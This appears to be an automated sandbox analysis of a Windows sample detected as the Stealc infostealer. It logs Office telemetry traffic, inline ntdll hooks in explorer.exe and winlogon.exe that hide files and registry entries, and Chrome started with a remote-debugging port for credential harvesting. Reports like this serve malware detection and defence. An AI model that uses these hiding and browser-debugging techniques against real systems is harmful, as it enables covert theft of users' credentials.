2024-11-11 00:15:19 UTC	192	OUT	GET /rules/rule703000v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:20 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:19 GMT Content-Type: text/xml Content-Length: 1369 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE32FE1A2" x-ms-request-id: 44d511d9-701e-000d-2909-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001519Z-16547b76f7f7rtshhC1DFWrtqn0000000df0000000005mst x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:20 UTC	1369	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	49903	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:20 UTC	192	OUT	GET /rules/rule700751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:20 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:20 GMT Content-Type: text/xml Content-Length: 1414 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE03B051D" x-ms-request-id: 8ba6fbd3-701e-0032-29d2-2ca540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001520Z-16547b76f7fx6rhxhC1DFW76kg0000000d7g00000000qytd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:20 UTC	1414	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	49905	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:20 UTC	192	OUT	GET /rules/rule700151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:20 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:20 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0A2434F" x-ms-request-id: 9063af41-401e-0064-7ed2-2c54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001520Z-16547b76f7f7rtshhC1DFWrtqn0000000dgg0000000002u6 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:20 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	49906	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:20 UTC	192	OUT	GET /rules/rule700150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:20 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:20 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE54CA33F" x-ms-request-id: 641899f6-501e-005b-515c-2ed7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001520Z-15869dbbcc6j87jfhC1DFWr0yc00000005h000000000d9mp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:20 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49907	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:20 UTC	192	OUT	GET /rules/rule703451v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:20 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:20 GMT Content-Type: text/xml Content-Length: 1409 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFC438CF" x-ms-request-id: 9ec2f91f-201e-0096-28d2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001520Z-16547b76f7f76p6chC1DFWctqw0000000de000000000ftqs x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:20 UTC	1409	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49904	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:20 UTC	192	OUT	GET /rules/rule700750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:20 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:20 GMT Content-Type: text/xml Content-Length: 1377 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT ETag: "0x8DC582BEAFF0125" x-ms-request-id: 4b8e26e4-601e-00ab-715f-2e66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001520Z-15869dbbcc6xcpf8hC1DFWxtx00000000frg000000006nsc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:20 UTC	1377	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49908	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:21 UTC	192	OUT	GET /rules/rule703450v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:21 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:21 GMT Content-Type: text/xml Content-Length: 1372 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6669CA7" x-ms-request-id: 149ea2ad-201e-003f-48d2-2c6d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001521Z-16547b76f7f775p5hC1DFWzdvn0000000d9000000000nbu2 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:21 UTC	1372	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49909	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:21 UTC	192	OUT	GET /rules/rule700901v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:21 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:21 GMT Content-Type: text/xml Content-Length: 1408 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1038EF2" x-ms-request-id: fe9a5d99-301e-0000-7e03-2feecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001521Z-17df447cdb5bz95mhC1DFWnk7w00000009hg00000000byfb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:21 UTC	1408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	49910	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:21 UTC	192	OUT	GET /rules/rule700900v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:21 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:21 GMT Content-Type: text/xml Content-Length: 1371 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT ETag: "0x8DC582BED3D048D" x-ms-request-id: 5a9e749e-101e-000b-39d2-2c5e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001521Z-16547b76f7fr28cchC1DFWnuws0000000dhg000000003xkx x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:21 UTC	1371	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	19:13:54
Start date:	10/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x1d0000
File size:	1'847'808 bytes
MD5 hash:	AE6AB1ACA8B68F61F6C9ECB97D418FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1998156221.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1677868840.0000000005270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1997064501.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:14:02
Start date:	10/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:14:03
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	19:14:03
Start date:	10/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2176,i,15720693888833450956,6277082314804719392,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:14:23
Start date:	10/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
